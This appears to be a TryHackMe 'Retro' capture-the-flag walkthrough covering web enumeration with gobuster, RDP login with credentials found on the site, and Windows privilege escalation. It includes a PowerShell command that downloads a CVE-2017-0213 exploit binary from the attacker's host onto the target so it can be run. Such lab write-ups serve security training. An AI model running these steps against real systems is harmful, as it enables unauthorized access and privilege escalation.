Post

THM - Retro

Retro - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.



THM - Retro

NMAP

image1

image2

Directory bruteforce:

1
gobuster dir -u http://10.10.216.131 -w /usr/share/seclists/Discovery/Web-Content/big.txt

image3

http://10.10.216.131/retro/

image4

Looking at the page source - Found:

image5

image6

image7

http://10.10.216.131/retro/index.php/author/wade/

image8

  • Something that could be a password - parzival:

image9

  • Port 3389 is open:
1
2
xfreerdp /v:10.10.216.131 /u:wade /p:"parzival" /dynamic-resolution /cert:ignore

image10

We can read user.txt

Start enumeration:

1
query user

image11

1
whoami /all

image12

  • Open Chrome and check history

image13

https://github.com/ycdxsb/WindowsPrivilegeEscalation

image14

** Check Recycle Bin for hhupd.exe file

image15

  • Run the program as administrator

image16

image17

image18

image19

image20

  • Kept getting to this point but no programs show up

  • Found a hint: Make sure to open Internet Explorer and Chrome BEFORE running the program

But still doesn’t work

  • Wes-NG suggested CVE-2017-0213

https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213

Download and extract the zip file and transfer to the windows machine:

1
2
(New-Object System.Net.WebClient).DownloadFile('http://10.8.24.66:8081/CVE-2017-0213_x64.exe', 'C:\Users\wade\CVE-2017-0213_x64.exe')

And just run it

image21

Read root.txt

This post is licensed under CC BY 4.0 by the author.